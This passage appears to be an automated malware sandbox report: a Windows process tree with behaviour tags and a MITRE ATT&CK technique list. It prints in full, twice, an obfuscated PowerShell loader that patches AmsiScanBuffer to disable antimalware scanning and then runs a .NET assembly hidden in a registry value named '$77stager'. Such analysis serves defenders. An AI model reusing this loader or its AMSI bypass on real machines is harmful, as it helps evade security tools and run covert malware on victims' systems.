  - Checks SCSI registry key(s)
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3776

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4060

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3216

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4284

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3312

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:5092

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1608

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:60

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3512

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2912

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:3208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:4240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3264

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3660

C:\Windows\system32\cmd.exe
cmd.exe /c "powershell.exe -Command ""function Local:ixJsXCiRfEUQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZktEpIReOhMVLC,[Parameter(Position=1)][Type]$YwANeYfFPM)$kiJglowNMxe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+'r'+'y'+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'pe',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+'ed,'+'A'+''+'n'+''+'s'+''+'i'+''+[Char](67)+''+'l'+''+'a'+'s'+'s'+''+[Char](44)+''+'A'+'u'+'t'+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$kiJglowNMxe.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+'ia'+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+''+','+''+[Char](72)+''+'i'+'d'+'e'+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZktEpIReOhMVLC).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+'e'+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$kiJglowNMxe.DefineMethod(''+'I'+''+[Char](110)+'vok'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'o'+'t'+','+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$YwANeYfFPM,$ZktEpIReOhMVLC).SetImplementationFlags(''+'R'+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $kiJglowNMxe.CreateType();}$DlxKVBGGtKAGD=([AppDomain]::CurrentDomain.GetAssemblies()^|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+''+'2'+'.'+[Char](85)+'n'+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+'a'+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$WyoHgUIpGolHzy=$DlxKVBGGtKAGD.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WlVpXCELLYTTQIUSKZQ=ixJsXCiRfEUQ @([String])([IntPtr]);$ZYjepCqRgiKfRsbZrairsl=ixJsXCiRfEUQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$giJPzSdQLwX=$DlxKVBGGtKAGD.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'Ha'+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+'dl'+[Char](108)+'')));$rUjyHAEdCDJlQe=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$giJPzSdQLwX,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+'b'+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$AdeZnrDSnmAKKAnlU=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$giJPzSdQLwX,[Object](''+'V'+''+'i'+''+[Char](114)+''+'t'+'u'+[Char](97)+'l'+'P'+'r'+'o'+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$MjbPiOm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rUjyHAEdCDJlQe,$WlVpXCELLYTTQIUSKZQ).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+'l'+'');$XupAgXbWoKxwwHGVt=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$MjbPiOm,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$WDFgBWdanW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdeZnrDSnmAKKAnlU,$ZYjepCqRgiKfRsbZrairsl).Invoke($XupAgXbWoKxwwHGVt,[uint32]8,4,[ref]$WDFgBWdanW);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](177-46),[Byte](7+186),[Byte](196-196),[Byte](247-63),[Byte](205-118),[Byte](218-218),[Byte](52-45),[Byte](186-58),[Byte](34+97),[Byte](41+151),[Byte](55-55),[Byte](106+89),[Byte](23+114),[Byte](157+35)),0,$XupAgXbWoKxwwHGVt,79-65);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdeZnrDSnmAKKAnlU,$ZYjepCqRgiKfRsbZrairsl).Invoke($XupAgXbWoKxwwHGVt,[uint32]8,0x20,[ref]$WDFgBWdanW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+'T'+''+'W'+'AR'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"""
1⤵
- System Time Discovery
- Suspicious use of WriteProcessMemory
PID:1560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command ""function Local:ixJsXCiRfEUQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZktEpIReOhMVLC,[Parameter(Position=1)][Type]$YwANeYfFPM)$kiJglowNMxe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+'r'+'y'+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'pe',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+'ed,'+'A'+''+'n'+''+'s'+''+'i'+''+[Char](67)+''+'l'+''+'a'+'s'+'s'+''+[Char](44)+''+'A'+'u'+'t'+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$kiJglowNMxe.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+'ia'+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+''+','+''+[Char](72)+''+'i'+'d'+'e'+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZktEpIReOhMVLC).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+'e'+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$kiJglowNMxe.DefineMethod(''+'I'+''+[Char](110)+'vok'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'o'+'t'+','+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$YwANeYfFPM,$ZktEpIReOhMVLC).SetImplementationFlags(''+'R'+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $kiJglowNMxe.CreateType();}$DlxKVBGGtKAGD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+''+'2'+'.'+[Char](85)+'n'+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+'a'+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$WyoHgUIpGolHzy=$DlxKVBGGtKAGD.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WlVpXCELLYTTQIUSKZQ=ixJsXCiRfEUQ @([String])([IntPtr]);$ZYjepCqRgiKfRsbZrairsl=ixJsXCiRfEUQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$giJPzSdQLwX=$DlxKVBGGtKAGD.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'Ha'+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+'dl'+[Char](108)+'')));$rUjyHAEdCDJlQe=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$giJPzSdQLwX,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+'b'+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$AdeZnrDSnmAKKAnlU=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$giJPzSdQLwX,[Object](''+'V'+''+'i'+''+[Char](114)+''+'t'+'u'+[Char](97)+'l'+'P'+'r'+'o'+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$MjbPiOm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rUjyHAEdCDJlQe,$WlVpXCELLYTTQIUSKZQ).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+'l'+'');$XupAgXbWoKxwwHGVt=$WyoHgUIpGolHzy.Invoke($Null,@([Object]$MjbPiOm,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$WDFgBWdanW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdeZnrDSnmAKKAnlU,$ZYjepCqRgiKfRsbZrairsl).Invoke($XupAgXbWoKxwwHGVt,[uint32]8,4,[ref]$WDFgBWdanW);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](177-46),[Byte](7+186),[Byte](196-196),[Byte](247-63),[Byte](205-118),[Byte](218-218),[Byte](52-45),[Byte](186-58),[Byte](34+97),[Byte](41+151),[Byte](55-55),[Byte](106+89),[Byte](23+114),[Byte](157+35)),0,$XupAgXbWoKxwwHGVt,79-65);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdeZnrDSnmAKKAnlU,$ZYjepCqRgiKfRsbZrairsl).Invoke($XupAgXbWoKxwwHGVt,[uint32]8,0x20,[ref]$WDFgBWdanW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+'T'+''+'W'+'AR'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:556

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1240

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 4c6493209c74b66ed848b0bb7851a75d X5hIRpOBwEyEV9L1cOjF+w.0.1.0.0.0
1⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:3696
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:1364

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:1084

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:1104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
PID:3796

C:\Windows\System32\smartscreen.exe
C:\Windows\System32\smartscreen.exe -Embedding
1⤵
PID:4876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
- Modifies data under HKEY_USERS
PID:1132

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2564

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5568

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6008

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:5384

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery